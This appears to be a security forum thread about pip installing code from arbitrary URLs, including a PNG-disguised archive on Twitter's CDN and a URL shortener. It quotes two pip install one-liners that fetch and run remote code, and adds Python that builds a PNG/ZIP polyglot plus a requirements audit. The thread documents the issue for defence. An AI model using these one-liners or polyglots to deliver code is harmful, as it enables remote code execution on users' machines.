Global Security Database

  • 1.  Security Glitch: Python pip problems

    Posted Oct 27, 2022 11:00:00 AM
    https://twitter.com/david3141593/status/1584462389977939968?s=43&t=CEmtkaMrle2hJwbdOXjMzw

    TIL python's pip will execute a setup.py directly from a ZIP archive from a web URL, with mime sniffing. This allows for a nice lolbin oneliner, with payload hosted on Twitter's CDN (or anywhere else really) pip install "https://pbs"."twimg"."com/media/Ff0iwcvXEAAQDZ3.png"

    https://twitter.com/David3141593/status/1584505603799408640

    It also follows redirects, so you can use a URL shortener too!
    pip install https://t"."co/uPXauf8eTg


    ------------------------------
    Kurt Seifried
    Chief Blockchain Officer and Director of Special Projects
    Cloud Security Alliance
    [email protected]
    ------------------------------
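
    Added example (not code from the tweets quoted above or from this thread): the sharp edge is that pip does not decide what a download is by its extension. It picks a filename from Content-Disposition, the URL, or the Content-Type header, and its unpacking code falls back to zipfile.is_zipfile(), which looks for the ZIP end-of-central-directory record near the end of the file. A valid PNG with a ZIP appended is therefore both a displayable image and an installable sdist. The block below constructs such a polyglot in memory, shows that the same sniffing check accepts it, and adds a small audit for pip arguments / requirements lines that would trigger this path. Hostnames (example.invalid), the placeholder setup.py, and the audit heuristics are assumptions for illustration; nothing is fetched or installed.

```python
"""Added example: why pip accepts an image URL as an sdist, and a cheap audit for it.

pip names the downloaded file from Content-Disposition, the URL, or Content-Type,
then its unpacking code also asks zipfile.is_zipfile(); that scan looks for a ZIP
end-of-central-directory record near the end of the file, so a valid PNG with a ZIP
appended is both a displayable image and an installable archive. Everything here is
constructed in-process; nothing is fetched or installed.
"""
import io
import struct
import zipfile
import zlib
from urllib.parse import urlparse

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
ZIP_LOCAL_HEADER = b"PK\x03\x04"
# Placeholder for an attacker's setup.py (assumption); the real one runs arbitrary code.
SETUP_PY = b"print('setup.py executed by pip')\n"

ARCHIVE_SUFFIXES = (".zip", ".whl", ".tar", ".tar.gz", ".tgz", ".tar.bz2", ".tar.xz")
URL_SCHEMES = ("http", "https", "ftp", "file")
VCS_PREFIXES = ("git+", "hg+", "svn+", "bzr+")


def _png_chunk(kind: bytes, data: bytes) -> bytes:
    crc = zlib.crc32(kind + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + kind + data + struct.pack(">I", crc)


def minimal_png() -> bytes:
    """A structurally valid 1x1 8-bit greyscale PNG, built here rather than loaded."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    scanline = b"\x00\x00"  # filter type 0, then one grey pixel
    return (PNG_SIGNATURE + _png_chunk(b"IHDR", ihdr)
            + _png_chunk(b"IDAT", zlib.compress(scanline))
            + _png_chunk(b"IEND", b""))


def build_polyglot(setup_py: bytes = SETUP_PY) -> bytes:
    """PNG bytes followed by a ZIP holding <name>-<ver>/setup.py, the sdist layout pip expects."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("pkg-0.0/setup.py", setup_py)
    # zipfile (and therefore pip) tolerates prepended data: member offsets are
    # corrected from the end-of-central-directory location when reading.
    return minimal_png() + buf.getvalue()


def looks_like_png(data: bytes) -> bool:
    return data.startswith(PNG_SIGNATURE)


def sniffs_as_zip(data: bytes) -> bool:
    """The same stdlib call pip's unpacking code uses to decide a download is a ZIP."""
    return zipfile.is_zipfile(io.BytesIO(data))


def is_polyglot(data: bytes) -> bool:
    """Sniffs as ZIP but does not begin with a ZIP local-file header: something is prepended."""
    return sniffs_as_zip(data) and not data.startswith(ZIP_LOCAL_HEADER)


def zip_members(data: bytes) -> list:
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def audit_requirement(line: str) -> list:
    """Findings for one pip argument or requirements.txt line; [] means an ordinary index lookup."""
    findings = []
    spec = line.strip()
    if not spec or spec.startswith(("#", "-")):  # comments and option lines (-r, --hash) skipped
        return findings
    has_hash = "--hash=" in spec
    if " @ " in spec:                             # PEP 508 direct reference: "name @ url"
        spec = spec.split(" @ ", 1)[1].strip()
    url = urlparse(spec.split(" ", 1)[0])         # first token; per-line options follow it
    is_vcs = url.scheme.startswith(VCS_PREFIXES)
    if url.scheme not in URL_SCHEMES and not is_vcs:
        return findings
    findings.append("direct-url: fetched outside the configured index")
    if url.scheme == "http":
        findings.append("cleartext: archive can be replaced in transit")
    if not is_vcs and not url.path.lower().endswith(ARCHIVE_SUFFIXES):
        findings.append("no archive extension: pip will decide by sniffing the content")
    if not has_hash:
        findings.append("no --hash: a redirect target or the file behind the URL can change silently")
    return findings


if __name__ == "__main__":
    blob = build_polyglot()
    print("PNG signature:", looks_like_png(blob), "| is_zipfile:", sniffs_as_zip(blob),
          "| members:", zip_members(blob))
    for req in ("requests==2.31.0", "https://example.invalid/media/pic.png",
                "pkg @ https://example.invalid/pkg-1.0.tar.gz --hash=sha256:0000"):
        print(req, "->", audit_requirement(req) or ["ok"])
```

    Run it as a script to see the polyglot pass both the PNG and ZIP checks, or point audit_requirement() at each line of a requirements file in CI. The "no archive extension" and "no --hash" findings are the ones that correspond to the two tweets: content sniffing is what lets a .png install, and following redirects means a shortener can be repointed after review unless a hash pins the bytes.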


  • 2.  RE: Security Glitch: Python pip problems

    Posted Oct 27, 2022 11:02:00 AM
    I don't think these are vulnerabilities per se, but they are definitely sharp edges that clearly most people don't know about. One thought: if there's an "informational" entry, e.g. "python pip will install software, as expected, but can also do so directly from arbitrary URLs"

    ------------------------------
    Kurt Seifried
    Chief Blockchain Officer and Director of Special Projects
    Cloud Security Alliance
    [email protected]
    ------------------------------